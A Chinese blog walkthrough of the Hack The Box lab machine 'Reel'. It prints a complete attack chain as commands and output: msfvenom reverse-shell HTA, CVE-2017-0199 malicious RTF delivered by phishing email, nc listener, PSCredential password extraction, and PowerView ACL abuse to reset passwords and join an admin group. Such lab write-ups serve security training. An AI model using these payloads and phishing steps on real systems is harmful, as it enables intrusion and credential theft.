HTB打靶(Active Directory 101 Reel)

最新推荐文章于 2024-03-30 20:16:59 发布
最新推荐文章于 2024-03-30 20:16:59 发布
阅读量453 收藏
点赞数
分类专栏: 渗透 域安全 文章标签: 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/128790867
版权
nmap扫描目标
nmap -A -T4 10.10.10.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST
Nmap scan report for 10.10.10.77
Host is up (0.55s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst:
|_  SYST: Windows_NT
22/tcp open  ssh     OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
|   2048 8220c3bd16cba29c88871d6c1559eded (RSA)
|   256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
|_  256 ac8bde251db7d838389b9c16bff63fed (ED25519)
25/tcp open  smtp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello:
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help:
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie:
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=1/18%Time=63C79217%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (86%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 25/tcp)
HOP RTT       ADDRESS
1   636.94 ms 10.10.16.1
2   637.07 ms 10.10.10.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.69 seconds

发现是一台Windows Server 2012主机且开放了ftp、ssh、smtp协议
尝试登录ftp、ssh
发现可以匿名登录ftp
ftp 10.10.10.77
    Connected to 10.10.10.77.
    220 Microsoft FTP Service
    Name (10.10.10.77:kali): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 User logged in.
    Remote system type is Windows_NT.
    ftp> dir
    229 Entering Extended Passive Mode (|||41001|)
    125 Data connection already open; Transfer starting.
    05-28-18  11:19PM       <DIR>          documents
    226 Transfer complete.
    ftp>
信息收集
收集发现一下文件并进行下载
ftp> dir
    229 Entering Extended Passive Mode (|||41007|)
    125 Data connection already open; Transfer starting.
    05-28-18  11:19PM                 2047 AppLocker.docx
    05-28-18  01:01PM                  124 readme.txt
    10-31-17  09:13PM                14581 Windows Event Forwarding.docx
    226 Transfer complete.
    ftp> get readme.txt
    local: readme.txt remote: readme.txt
    229 Entering Extended Passive Mode (|||41008|)
    150 Opening ASCII mode data connection.
    100% |*******************************|   124        0.19 KiB/s    00:00 ETA
    226 Transfer complete.
    124 bytes received in 00:00 (0.13 KiB/s)
    ftp> get Windows\ Event\ Forwarding.docx
    local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
    229 Entering Extended Passive Mode (|||41010|)
    150 Opening ASCII mode data connection.
    100% |*******************************| 14581       14.21 KiB/s    00:00 ETAftp: Reading from network: Interrupted system call
    0% |                               |    -1        0.00 KiB/s    --:-- ETA
    226 Transfer complete.
    WARNING! 51 bare linefeeds received in ASCII mode.
    File may not have transferred correctly.
    ftp> dir
    229 Entering Extended Passive Mode (|||41011|)
    125 Data connection already open; Transfer starting.
    05-28-18  11:19PM                 2047 AppLocker.docx
    05-28-18  01:01PM                  124 readme.txt
    10-31-17  09:13PM                14581 Windows Event Forwarding.docx
    226 Transfer complete.
    ftp> get AppLocker.docx
    local: AppLocker.docx remote: AppLocker.docx
    229 Entering Extended Passive Mode (|||41012|)
    150 Opening ASCII mode data connection.
    100% |*******************************|  2047        2.27 KiB/s    00:00 ETA
    226 Transfer complete.
    WARNING! 9 bare linefeeds received in ASCII mode.
    File may not have transferred correctly.
    2047 bytes received in 00:01 (1.70 KiB/s)
    ftp> exit
    221 Goodbye.
使用exiftool查看"Windows Event Forwarding.docx"源数据
命令:exiftool "Windows Event Forwarding.docx"
回显:   
    ExifTool Version Number         : 12.49
    File Name                       : Windows Event Forwarding.docx
    Directory                       : .
    File Size                       : 15 kB
    File Modification Date/Time     : 2023:01:18 01:58:38-05:00
    File Access Date/Time           : 2023:01:18 01:59:18-05:00
    File Inode Change Date/Time     : 2023:01:18 01:58:38-05:00
    File Permissions                : -rw-r--r--
    File Type                       : DOCX
    File Type Extension             : docx
    MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
    Zip Required Version            : 20
    Zip Bit Flag                    : 0x0006
    Zip Compression                 : Deflated
    Zip Modify Date                 : 1980:01:01 00:00:00
    Zip CRC                         : 0x82872409
    Zip Compressed Size             : 385
    Zip Uncompressed Size           : 1422
    Zip File Name                   : [Content_Types].xml
    Creator                         : nico@megabank.com
    Revision Number                 : 4
    Create Date                     : 2017:10:31 18:42:00Z
    Modify Date                     : 2017:10:31 18:51:00Z
    Template                        : Normal.dotm
    Total Edit Time                 : 5 minutes
    Pages                           : 2
    Words                           : 299
    Characters                      : 1709
    Application                     : Microsoft Office Word
    Doc Security                    : None
    Lines                           : 14
    Paragraphs                      : 4
    Scale Crop                      : No
    Heading Pairs                   : Title, 1
    Titles Of Parts                 :
    Company                         :
    Links Up To Date                : No
    Characters With Spaces          : 2004
    Shared Doc                      : No
    Hyperlinks Changed              : No
    App Version                     : 14.0000
发现nico@megabank.com邮箱
尝试通过邮箱进行网络钓鱼获得shell
使用的CVE:
    CVE-2017-0199
下载:
    https://github.com/bhdresh/CVE-2017-0199
简单说明:
    CVE-2017-0199是Microsoft Office在OLE处理机制实现上存在的一个逻辑漏洞,
    此漏洞的成因主要是word在处理内嵌OLE2LIN对象时,通过网络更新对象时没有
    正确处理Content-Type所导致的一个逻辑漏洞。由于逻辑漏洞的成因,就导致利用
    该漏洞时不需要绕过微软采用的一系列诸如ASLR、DEP之类的漏洞缓解措施,因此成功率非常高
msf生成shell马
    命令:
        msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.13 lport=6666 -f hta-psh -o shell.hta
    使用python开启http服务用于远程文件加载
    命令:
        python3 -m http.server 80
生成rft载荷文档
    命令:
        python2 cve-2017-0199_toolkit.py -M gen -w hi.rtf -u http://10.10.16.13/shell.hta -t rtf -x 0
开启nc用于反弹shell接收
命令:
    nc -nvlp 6666
sendemail向目标邮箱发送载荷文件
命令:
    sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a hi.rtf -s 10.10.10.77 -v 
回显:
    Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => Connecting to 10.10.10.77:25
    Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => My IP address is: 10.10.16.13
    Jan 18 03:59:55 kali sendEmail[40007]: SUCCESS => Received:     220 Mail Service ready
    Jan 18 03:59:55 kali sendEmail[40007]: INFO => Sending:         EHLO kali
    Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received:     250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
    Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending:         MAIL FROM:<mac@megabank.com>
    Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received:     250 OK
    Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending:         RCPT TO:<nico@megabank.com>
    Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received:     250 OK
    Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending:         DATA
    Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received:     354 OK, send.
    Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending message body
    Jan 18 03:59:57 kali sendEmail[40007]: Setting content-type: text/plain
    Jan 18 03:59:57 kali sendEmail[40007]: DEBUG => Sending the attachment [hi.rtf]
    Jan 18 04:00:09 kali sendEmail[40007]: SUCCESS => Received:     250 Queued (12.156 seconds)
    Jan 18 04:00:09 kali sendEmail[40007]: Email was sent successfully!  From: <mac@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [hi.rtf] Server: [10.10.10.77:25]
过一段时间后nc获得shell
    python http被访问:
        python3 -m http.server 80
            Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
            10.10.10.77 - - [18/Jan/2023 04:00:25] "GET /shell.hta HTTP/1.1" 200 -
            10.10.10.77 - - [18/Jan/2023 04:00:26] "GET /shell.hta HTTP/1.1" 200 -
    nc获得shell
    nc -nvlp 6666
        listening on [any] 6666 ...
        connect to [10.10.16.13] from (UNKNOWN) [10.10.10.77] 60488
        Microsoft Windows [Version 6.3.9600]
        (c) 2013 Microsoft Corporation. All rights reserved.

        C:\Windows\system32>
获取user旗帜
    C:\Users\nico\Desktop>type user.txt
使用msf代替nc获取shell
    msfconsole 
    msf > use exploit/windows/fileformat/office_word_hta
    msf > set lhost 10.10.14.17
    msf > set lport 4444
    msf > set srvhost 10.10.14.17
    msf > run
    sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v
获得Tom账号
在当前用户桌面上发现敏感文件cred.xml该文件是 PSCredential 
对象当中Export-CliXml方法输出的 XML 文档,而 PSCredential 
对象在 Powershell 中主要用于存储用户名、密码和凭据
使用powershell提取密码命令:
    powershell -c "$cred = Import-CliXml -Path c:\Users\nico\Desktop\cred.xml;$cred.GetNetworkCredential() | Format-List *"
回显:   
    UserName       : Tom
    Password       : 1ts-mag1c!!!
    SecurePassword : System.Security.SecureString
    Domain         : HTB
获得账号htb\Tom:1ts-mag1c!!!
开启smb匿名访问用于传输文件
开启smb匿名访问命令:    
    python3 smbserver.py share /home/kali/Desktop/temp/
htb\Tom:1ts-mag1c!!!账号ssh登录目标机器进行信息收集,发现以下关键信息
    C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

    05/29/2018  07:57 PM    <DIR>          .
    05/29/2018  07:57 PM    <DIR>          ..
    11/16/2017  11:50 PM           112,225 acls.csv
    10/28/2017  08:50 PM             3,549 BloodHound.bin
    10/24/2017  03:27 PM           246,489 BloodHound_Old.ps1
    10/24/2017  03:27 PM           568,832 SharpHound.exe
    10/24/2017  03:27 PM           636,959 SharpHound.ps1
                5 File(s)      1,568,054 bytes
                2 Dir(s)   4,937,048,064 bytes free
    将acls.csv拖回到攻击机
    命令:
       copy acls.csv \\10.10.16.13\share\
手动分析acls.csv文件
发现一下关键信息:   
claire@HTB.LOCAL	USER		tom@HTB.LOCAL	USER	WriteOwner		AccessAllowed	FALSE
Backup_Admins@HTB.LOCAL	GROUP		claire@HTB.LOCAL	USER	WriteDacl		AccessAllowed	FALSE
tom@HTB.LOCA具有对claire@HTB.LOCAL账号WriteOwner权限,claire@HTB.LOCAL账号对 Backup_Admins@HTB.LOCAL具有WriteDacl权限。
权限提升
使用PowerView进行权限滥用提权
下载:https://github.com/PowerShellMafia/PowerSploit
所在目录:PowerSploit-master\PowerSploit-master\Recon
利用方式:
     . .\PowerView.ps1 //将PowerView导入
     把当前用户tom设置为claire用户的 ACL 的所有者并授予其修改密码的权限
    Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
    Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
    设置claire的密码为Ab345678123!@#
    $cred = ConvertTo-SecureString "Ab345678123!@#" -AsPlainText -force
    Set-DomainUserPassword -identity claire -accountpassword $cred
    ssh登录
    ssh claire@10.129.5.10
    查看backup_admins组发现只有ranj用户
    net group backup_admins
    将claire用户添加到backup_admins用户组下之后重新登录
    net group backup_admins claire /add
    net group backup_admins
在备份目录Backup Scripts中遍历密码,成功找到administrator密码Cr4ckMeIfYouC4n!获取到system权限
总结
nmap发现是一台Windows Server 2012主机且开放了ftp、ssh、smtp协议,发现可以匿名登录ftp
发现docx文件exiftool查看"Windows Event Forwarding.docx"源数据找到邮箱,使用 CVE-2017-0199
进行钓鱼攻击获得nc反弹shell获得权限,分析Bloodhound发现 tom@HTB.LOCA具有对claire@HTB.LOCAL
账号WriteOwner权限,claire@HTB.LOCAL账号对 Backup_Admins@HTB.LOCAL具有WriteDacl权限,
尝试使用PowerView进行权限滥用攻击,提权成功后在备份目录Backup Scripts中遍历密码,
成功找到administrator密码Cr4ckMeIfYouC4n!获取到system权限。
虚构之人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1200
HackTheBox Active Directory 101 Forest
HTB打靶日记:Escape
m0_73998094的博客
03-04 2403
HTB打靶日记:Escape
【Hack The Box】windows练习-- Reel
人间体佐菲的博客
11-17 442
【Hack The Box】windows练习-- Reel
51进阶-信息搜集原理与实践2-20220615
32bin的博客
06-15 820
1/[问答题](100分) 1. 使用 nmap 扫描 owaspbwa 靶场 2. 找出主机开放的端口 3. 根据端口扫描特定服务(如 mysql 或 apache 等) 4. 在 nmap 的 script 中找到与服务有关的任一脚本 5. 使用对应的脚本对指定服务进行扫描 6. 上述每一步都需要附上截图(必须包含每一天命令)进行说明 编写实验报告时,将整个作业过程中的涉及的步骤、效果、思路等整理为Word或PDF或PPT⽂档并上传,⽂档名称为"姓名-作业名称"。...
Opacity CTF WriteUp
最新发布
bill_fang的博客
03-30 823
URL:https://tryhackme.com/r/room/opacityStage 1: ReconAs a general recon method, use namp for port and service scanning.root@ip-10-10-143-55:~# nmap -sT -p- 10.10.85.78 Starting Nmap 7.60 ( htt...
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
HTB打靶日记:Investigation
01-27
hackthebox
HTB打靶日记:Mentor
01-11
hackthebox
HTB打靶日记:BroScience
01-10
在本文中,我们将深入探讨一个名为“BroScience”的HackTheBox靶场机器的渗透测试过程。这个场景主要涉及Web安全、Linux系统以及多种攻击技术。首先,我们从信息收集开始,使用Nmap对目标IP(10.129.125.159)进行...
htb:破解盒子的演练
01-31
htb 破解盒子的演练
[HackMyVM]靶场Zurrak
qq_34942239的博客
03-30 921
127.0.0.1的smb会执行emergency.sh脚本,那么我们劫持一下然后反弹shell。回到index.php,抓包发现cookie里面有token也是一个jwt,解析一下。跳转到New folder可以用cd "New folder",不然有空格挂载不了。md我不知道该如何下载到我的kali上,这里先不说,继续。有密码了,但是没有用户名,猜测是exe文件名asli。连接成功(后面我都不会,看着wp做的,也记录一下)这次不一样了,多一个isAdmin参数。一个朴素的登录界面,源码里给了账号密码。
使用Telnet进行SMTP/POP3/FTP/NNTP (zz)
afxid的专栏
05-12 6869
才发现竟然可以用telnet来和SMTP服务器交互.MS的SMTM 服务器还提供命令行交互的界面。而HTTP的SERVER也是一样可以用TELNET来操作的,只是没有命令行回显。使用Telnet进行SMTP//POP3//FTP//NNTP [2] 在这个系列的文章中,我引用了Richard Stevens的内容,向伟大的Richard Stevens致敬! [2] SMTP 介绍SMTP之前
SMTP 基本命令
overlord_bingo的博客
03-02 5374
转自:点击进入 SMTP定义了14个命令,它们是: HELO  MAIL FROM:  RCPT TO:  DATA  RSET  SEND FROM:  SOML FROM:  SAML FROM:  VRFY  EXPN  HELP [ ]  NOOP  QUIT  TURN  其中使得SMTP工作的基本的命令有7个分别为: HELO﹑MA
Reel靶机
weixin_45007073的博客
11-15 4022
Reel信息收集漏洞利用提权到TOM权限提权到Administrator 信息收集 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-14 05:18 EST Nmap scan report for 10.10.10.77 Host is up (0.30s lat
HTB靶场系列 Windows靶机 Arctic靶机
m0_57221101的博客
01-30 2642
这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机 勘探 nmap nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST Nmap scan report for 10.10.10.11 Host is up (0.28s latency). Not shown: 65532 filtered ports PORT
HTB系列】靶机Teacher的渗透测试详解
大方子
04-27 1365
Kali: 10.10.14.50 靶机地址:10.10.10.153 先用nmap 对靶机进行扫描 nmap -sC -sV -sT 10.10.10.153 只开启了80端口,网页内容如下 一个静态的网页,还有一些其他的页面,Courses,Students等等 检查下网页的源代码,在GALLERY页面发现一个奇怪的点 ...
HTB:堡垒系列-jet.com
m0_46391769的博客
11-01 7098
HTB:jet.com练习 信息收集 首先masscan: Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-10-31 08:05:08 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [65535 ports/host] Discovered open port 80
虚拟机 Centos Linux 安装samba(smb)
qq_37167546的博客
05-07 532
在本地开发项目的过程中,我们需要使用的一些开发工具,这些工具一般安装在windows上,但是我们的代码安装在linx上,那么我们就需要用到smb来进行文件的映射,这里我们先讲如何安装使用,末尾再写原理 1. 首先我们确定是否有安装smb rpm -qa samba #qa为(query all)的缩写 如果已经安装了,就会返回samba的版本,那么我们可以跳过第二步 2. 安装 samba yu...
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值